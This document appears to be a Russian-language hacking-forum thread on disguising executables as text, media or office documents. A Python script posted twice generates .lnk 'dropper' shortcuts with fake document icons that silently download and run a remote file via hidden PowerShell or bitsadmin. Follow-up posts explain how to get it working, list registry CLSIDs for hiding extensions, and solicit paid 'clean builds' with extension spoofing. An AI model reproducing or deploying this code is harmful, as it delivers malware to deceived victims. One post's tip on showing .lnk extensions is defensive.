Видео Маскируем .exe в txt документ или mp4 медиа

[2AM]

Звучит очень интересно, мне как человеку который поверхностно знаком по этому направлению пока что с виду понравилось всё, ибо в будущем есть планы пойти к реализации своих идей, а теперь ещё больше даже загорелся желанием.
Кстати если будет что-то подобное по PDF формату, буду рад увидеть это на форуме от тебя.

 

[dunkel]

Звучит очень интересно, мне как человеку который поверхностно знаком по этому направлению пока что с виду понравилось всё, ибо в будущем есть планы пойти к реализации своих идей, а теперь ещё больше даже загорелся желанием.
Кстати если будет что-то подобное по PDF формату, буду рад увидеть это на форуме от тебя.

Да в софте есть все иконки всех документов.
сам pdf вообще поддерживает скрипты/макросы, и иногда(часто) находят уязвимости для всяких пдф читалок

ð Sploitus | Exploits & Tools Search Engine

Sploitus is a convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities. The search engine is also a good resource for finding security and vulnerability discovery tools.

sploitus.com

Можешь потыкать эти тулзы или найти другие и потестировать на виртуалке. Или купить услугу один раз "крипт в pdf" и пореверсить получившуюся pdf, посмотреть как работает

 

[xrahitel]

я просто слышал что размер вроде можно изменить

Ну а при чем тут размер ты же написал про расширение этот способ работал в 2014г вот моё видео об этом.

То что слышал про размер то же баян от 2021

 

[xrahitel]

Можно кстати название файла и название папки без имени сделать alt+0160

А можно к паке значок припездярить и запуфить .exe и будет бинго

Данные значение находиться тут HKEY_CLASSES_ROOT\CLSID\

{30590066-98b5-11cf-bb82-00aa00bdce0b}
{09FD2EFF-5669-11D3-B65F-00C04F8EF32D}
{18A06B6B-2F3F-4e2b-A611-52BE631B2D22}
{1B261B22-AC6A-4E68-A870-AB5080E8687B}
{1CDC7D25-5AA3-4DC4-8E0C-91524280F806}
{25336920-03F9-11cf-8FD0-00AA00686F13}
{48123BC4-99D9-11D1-A6B3-00C04FD91555}
{73FDDC80-AEA9-101A-98A7-00AA00374959}

 

[begem0tina]

у кого нибудь заработал Quantum? что то у меня вообще не запускает нагрузку

 

[mcgp]

Ну а при чем тут размер ты же написал про расширение этот способ работал в 2014г вот моё видео об этом.

А в какой версии winrar это работало? И работает ли сейчас?

 

[Shaurmist25]

Иконку можна ставить напрямую с ехе или длл которые встроены в винду. А например если указать иконку архива винрар, а его нету у жертвы то будет иконка пустого файла.

#!/usr/bin/python3
# -*- coding: utf-8 -*-

__all__ = ['get_available_payloads', 'generate_exploit_shortcut']

# Import modules
from os import path
from winshell import desktop, shortcut

# Target DLL paths
dll = dict(
    imageres='%SystemRoot%\\system32\\imageres.dll',
    shell32='%SystemRoot%\\system32\\shell32.dll',
    wmploc='%SystemRoot%\\system32\\wmploc.dll',
    winrar='%ProgramFiles%\\WinRAR\\WinRAR.exe',
    office='%ProgramFiles%\\Microsoft Office\\root\\Office16\\',
    adobe='%ProgramFiles%\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe'
)

# Available icons
icons = {
    'xls': (dll['office'] + 'EXCEL.EXE', 0),
    'doc': (dll['office'] + 'WINWORD.EXE', 0),
    'ppt': (dll['office'] + 'PPTICO.EXE', 0),
    'rar': (dll['winrar'], 0),
    'zip': (dll['winrar'], 0),
    'mp3': (dll['wmploc'], 49),
    'avi': (dll['wmploc'], 48),
    'png': (dll['imageres'], 67),
    'jpg': (dll['imageres'], 67),
    'txt': (dll['imageres'], 97),
    'pdf': (dll['adobe'], 1),
    'file': (dll['imageres'], 2),
    'folder': (dll['shell32'], 4),
}

techniques = {
    'powershell': '%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden iwr -Uri {target_url} -OutFile $env:TEMP\\{output_name};Start-Process $env:TEMP\\{output_name}',
    'bitsadmin': "bitsadmin /transfer Update /download /priority FOREGROUND {target_url} %temp%\\{output_name}' & start %temp%\\{output_name}'"
}

def get_available_payloads() -> list[str]:
    '''
    Get list of available file extensions
    '''
    return list(icons.keys())


def generate_exploit_shortcut(url: str, extension: str, description: str = '', technique = 'powershell') -> str:
    '''
    Generate shortcut dropper

    target_url = 'https://ryara.net/putty-url/download/0.78/x86_64/putty.exe'
    generate_exploit_shortcut(target_url, 'txt')
    '''
    assert extension in icons, 'Unknown extension was specified'
    savePath = path.join(desktop(), f'Payload.{extension}.lnk')
    with shortcut(savePath) as link:
        link.path = r'%comspec%'
        link.description = description
        link.icon_location = icons[extension]
        link.arguments = '/C ' + techniques[technique].format(
            target_url=url,
            output_name=path.basename(url)
        )
    return savePath

 

[mcgp]

Иконку можна ставить напрямую с ехе или длл которые встроены в винду. А например если указать иконку архива винрар, а его нету у жертвы то будет иконка пустого файла.

#!/usr/bin/python3
# -*- coding: utf-8 -*-

__all__ = ['get_available_payloads', 'generate_exploit_shortcut']

# Import modules
from os import path
from winshell import desktop, shortcut

# Target DLL paths
dll = dict(
    imageres='%SystemRoot%\\system32\\imageres.dll',
    shell32='%SystemRoot%\\system32\\shell32.dll',
    wmploc='%SystemRoot%\\system32\\wmploc.dll',
    winrar='%ProgramFiles%\\WinRAR\\WinRAR.exe',
    office='%ProgramFiles%\\Microsoft Office\\root\\Office16\\',
    adobe='%ProgramFiles%\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe'
)

# Available icons
icons = {
    'xls': (dll['office'] + 'EXCEL.EXE', 0),
    'doc': (dll['office'] + 'WINWORD.EXE', 0),
    'ppt': (dll['office'] + 'PPTICO.EXE', 0),
    'rar': (dll['winrar'], 0),
    'zip': (dll['winrar'], 0),
    'mp3': (dll['wmploc'], 49),
    'avi': (dll['wmploc'], 48),
    'png': (dll['imageres'], 67),
    'jpg': (dll['imageres'], 67),
    'txt': (dll['imageres'], 97),
    'pdf': (dll['adobe'], 1),
    'file': (dll['imageres'], 2),
    'folder': (dll['shell32'], 4),
}

techniques = {
    'powershell': '%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden iwr -Uri {target_url} -OutFile $env:TEMP\\{output_name};Start-Process $env:TEMP\\{output_name}',
    'bitsadmin': "bitsadmin /transfer Update /download /priority FOREGROUND {target_url} %temp%\\{output_name}' & start %temp%\\{output_name}'"
}

def get_available_payloads() -> list[str]:
    '''
    Get list of available file extensions
    '''
    return list(icons.keys())


def generate_exploit_shortcut(url: str, extension: str, description: str = '', technique = 'powershell') -> str:
    '''
    Generate shortcut dropper

    target_url = 'https://ryara.net/putty-url/download/0.78/x86_64/putty.exe'
    generate_exploit_shortcut(target_url, 'txt')
    '''
    assert extension in icons, 'Unknown extension was specified'
    savePath = path.join(desktop(), f'Payload.{extension}.lnk')
    with shortcut(savePath) as link:
        link.path = r'%comspec%'
        link.description = description
        link.icon_location = icons[extension]
        link.arguments = '/C ' + techniques[technique].format(
            target_url=url,
            output_name=path.basename(url)
        )
    return savePath

Благодарю за ответ, но почему то ваш код ничего не создал. С Python я на вы, по этому просто скопировал вставил, но ничего не произошло, наверное я что то сделал ни так.
Да собственно говоря вопрос то в другом, как заставить архив отображать иконку (к примеру WORD) у файла exe.

 

[kotkokos]

не получилось, можно контакт в пм для помощи пожалуйся?

 

[Shaurmist25]

Благодарю за ответ, но почему то ваш код ничего не создал. С Python я на вы, по этому просто скопировал вставил, но ничего не произошло, наверное я что то сделал ни так.
Да собственно говоря вопрос то в другом, как заставить архив отображать иконку (к примеру WORD) у файла exe.

для начала pip install winshell

и в конце кода добавьте вызов функции: generate_exploit_shortcut('DIRECT_LINK_HERE', 'png')

 

[msfconsolee]

It can easy also if using the Rar method

 

[mcgp]

для начала pip install winshell

и в конце кода добавьте вызов функции: generate_exploit_shortcut('DIRECT_LINK_HERE', 'png')

Благодарю за исправление, ярлык создал, но недочёт с архивом остался. Я Касперский такой ярлык блочит, говорит вирус)))

 

[mcgp]

It can easy also if using the Rar method

Если не затруднит, дайте ссылочку где почитать об этом методе.

 

[alex778]

Кто не хочет у себя на компе таких сюрпризов с lnk файлами, в реестре надо убрать запись HKEY_CLASSES_ROOT\lnkfile\NeverShowExt.

 

[jazet]

Ну а при чем тут размер ты же написал про расширение

я думал если с размером такое было, то и с названием может быть получится

 

[Fargo]

Кто может делать чистые билды со спуфом расширений, покупал бы услугу. Велком пм.

 

[Great0]

a gde wsjatj etu programku?) spasibo sa informatsiju

 

[HikMbed]

Всё так просто?

 

[meiiion]

Кто может делать чистые билды со спуфом расширений, покупал бы услугу. Велком пм.

мне тоже интересно кто может делать чистые билды со спуфом расширений, кто может пишите плиз в личку.

 

[Relativity666]

a gde wsjatj etu programku?) spasibo sa informatsiju

threads/103450/